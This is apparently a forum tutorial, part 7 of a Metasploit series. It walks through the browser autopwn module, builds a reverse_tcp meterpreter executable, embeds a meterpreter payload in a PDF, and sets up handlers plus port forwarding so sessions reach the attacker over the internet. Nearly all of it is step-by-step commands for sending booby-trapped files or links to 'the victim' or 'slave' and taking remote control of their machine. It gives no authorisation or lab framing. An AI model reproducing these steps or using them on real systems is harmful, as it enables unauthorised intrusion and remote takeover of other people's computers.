INTRODUCTION TO METASPLOIT PART-7 >> BROWSER AUTOPWN & EXECUTABLE PAYLOAD

We often do not know which browser the target is using. We also might not know if he has java installed at all. That's when browser autopwn comes in handy. With it, we run a huge number of browser based exploits all at once. They get executed one after another. That's why it is called autopwn.

This exploit is special. We do not have to set payload, it does it for us.

So let's begin.

PHP Code:

set lhost 192.168.2.104
set uripath /
exploit 

It will take some time to load. Be patient.
Send http://192.168.2.104:8080/ to the victim and autopwn process will begin. You will soon have your session.

We can also make executable file and send it to remote machine. When they run it, we will get meterpreter connection. This works like a RAT. We create our executable payload which has our local IP, and port. When we send it to someone it connects back to us. Let's start!
In backtrack, open a new console and type:

MSFpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.104 LPORT=4444 X > /root/Desktop/server.exe

This will create our server. When target runs it, it will try to connect back to us. So we need to set up a listener. It will listen for incoming connections and accept them.

Start Metasploit console and type:

PHP Code:

use exploit/multi/handler 

Now let's add payload:

PHP Code:

Set Payload windows/meterpreter/reverse_tcp 

Set up our LPort and Lhost:

PHP Code:

Set LHost 192.168.2.103
Set Lport 4444 

And then type exploit. It will start listening for incoming connections. When slave runs the file, meterpreter session will be created.

This can also be used outside LAN. When creating your executable in backtrack, use your external IP as your LHOST. Forward the LPORT to your local IP and when you set up a listener, set it to use your local IP, and not external one.

Some of you might still not know what port forwarding is, so let me explain. It's forwarding all incoming connections on a certain port to local machine in your network. Why is it necessary? When a connection comes through WAN to your router, the router doesn't know where to send it. That's why you forward all connections. That way the confusion isn't made and session gets established. Read more here. If you still have no idea what I'm talking about, you should study networking before proceeding.

We can inject our payload into formats other then .exe. Today we'll be using PDF file format exploit. It injects payload in existing PDF file and when PDF file is opened it executes the payload as a separate process thus leaving the legit one intact.

Open a new console and type msfconsole to start metasploit.

PHP Code:

use exploit/windows/fileformat/adobe_pdf_embedded_exe 

Now let's how options.

PHP Code:

show options 

It wants us to set INFILENAME, or in other words, the legit PDF document. Just go and download one.

PHP Code:

set INFILENAME /root/Desktop/Sample.pdf 

Set the payload to Meterpreter and run the exploit.

PHP Code:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (LHOST)
exploit 

Now we need to start a listener, so open a new console and type:

PHP Code:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.104 (LHOST)
exploit 

Now send the new, generated PDF to the victim and when he runs it you'll get your meterpreter session.